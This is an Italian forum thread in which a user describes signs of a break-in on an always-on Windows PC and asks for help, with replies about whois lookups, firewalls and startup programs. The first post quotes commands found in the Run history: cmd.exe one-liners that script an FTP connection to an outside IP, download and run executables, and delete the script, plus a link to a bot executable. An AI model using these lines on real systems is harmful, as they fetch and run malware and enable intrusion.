Probabile intrusione

[**one**]

Salve a tutti,

mi sono accorto ultimamente di alcune cose strane sul mio pc. E' un pc che lascio acceso tutto il giorno. Molte volte lo lasciavo bloccato e lo trovavo sbloccato oppure trovavo la scritta "password errata". L'ultima cosa che ho notato è che andando su start->esegui mel menù a tendina escono fuori delle righe di comando che io non ho mai inserito. le scrivo qua sotto.

http://localhost/windows/system32/msnservr.exe

cmd.exe /c del i&echo open 81.208.83.226 25159 > i&echo user 1 1 >> i &echo get 445.exe >> i &echo quit >> i &ftp -n -s:i &445.exe&del i&exit

cmd.exe /c del i&echo open 81.208.83.226 25159 > i&echo user 1 1 >> i &echo get 815.exe >> i &echo quit >> i &ftp -n -s:i &815.exe&del i&exit
h**p://miwebsite.com/crxbot.exe

Con un whois ho visto che l'ip appartiene al range di Amsterdam, ma sta cosa non mi è di aiuto.

Ho il firewall sygate personal e sono un utente fastweb.

che ne pensate ?

[wizard1993]

Quote:

Originariamente inviato da **one**

Salve a tutti,

mi sono accorto ultimamente di alcune cose strane sul mio pc. E' un pc che lascio acceso tutto il giorno. Molte volte lo lasciavo bloccato e lo trovavo sbloccato oppure trovavo la scritta "password errata". L'ultima cosa che ho notato è che andando su start->esegui mel menù a tendina escono fuori delle righe di comando che io non ho mai inserito. le scrivo qua sotto.

http://localhost/windows/system32/msnservr.exe

cmd.exe /c del i&echo open 81.208.83.226 25159 > i&echo user 1 1 >> i &echo get 445.exe >> i &echo quit >> i &ftp -n -s:i &445.exe&del i&exit

cmd.exe /c del i&echo open 81.208.83.226 25159 > i&echo user 1 1 >> i &echo get 815.exe >> i &echo quit >> i &ftp -n -s:i &815.exe&del i&exit
h**p://miwebsite.com/crxbot.exe

Con un whois ho visto che l'ip appartiene al range di Amsterdam, ma sta cosa non mi è di aiuto.

Ho il firewall sygate personal e sono un utente fastweb.

che ne pensate ?

chiama il 112 se sei vendicatico; mentre puoi semplicemente installare un altro firewaal come zone alarm

[Devil!]

mi diresti il range di ip?

[**one**]

Quote:

Originariamente inviato da Devil!

mi diresti il range di ip?

sto uscendo al volo dopo te lo posto.. intanto ho notato un'altra cosina carina.. quando riavvio il pc.. vado su start->esegui appena si apre la finestra comincia a scrivere una di quelle righe più lunghe in automatico e poi la lancia.. però gli do in culo cancellandola al volo. il problema è quando non ci sono che3 nn so se la rilancia oppure no.

[**one**]

ecco qua cosa dice il whois di un sito internet..

81.208.83.226
Record Type: IP Address

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 81.0.0.0 - 81.255.255.255
CIDR: 81.0.0.0/8
NetName: 81-RIPE
NetHandle: NET-81-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: NS-EXT.ISC.ORG
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate:
Updated: 2005-07-27

[**one**]

un altro whois dice che è un altro fastweb di roma

Whois Record


inetnum: 81.208.0.0 - 81.208.127.255
org: ORG-FA7-RIPE
netname: IT-FASTWEB-20021001
descr: Provider Local Registry
descr: Fastweb
country: IT
admin-c: IRS4-RIPE
tech-c: IRS4-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: FASTWEB-MNT
mnt-routes: FASTWEB-MNT
source: RIPE # Filtered

organisation: ORG-FA7-RIPE
org-name: Fastweb
org-type: LIR
address: Via Caracciolo 51
address: 20155
address: Milano
address: Italy
phone: +39 02 45451
fax-no: +39 02 45454811
admin-c: GR417-RIPE
admin-c: DP4556-RIPE
admin-c: AL510-RIPE
admin-c: CBF1-RIPE
admin-c: FM170-RIPE
admin-c: IRS4-RIPE
admin-c: LS1966-RIPE
admin-c: ER1255-RIPE
admin-c: FM5655-RIPE
mnt-ref: FASTWEB-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered

role: IP Registration Service
address: Via Caracciolo, 51
address: 20155 Milano MI
address: Italy
remarks: trouble:
remarks: trouble: In case of improper use originating from our network,
remarks: trouble: please mail customer or Whois Privacy and Spam Prevention by DomainTools.com
remarks: trouble:
admin-c: GR417-RIPE
tech-c: AL510-RIPE
tech-c: DP4556-RIPE
nic-hdl: IRS4-RIPE
mnt-by: FASTWEB-MNT
source: RIPE # Filtered

[Devil!]

esatto, non poteva essere esterno alla rete fastweb, doveva per forza essere uno interno

http://plany.fasthosting.it/dbmap.as...tura&pagesize=

sicuro che non venga indicato anche un ip del tipo 23.***.***.*** ?

nel frattempo reimposta le regole del firewall con un livello più elevato di protezione

e controlla i programmi che partono al boot disabilitando quelli malevoli (puoi editare da msconfig --> avvio)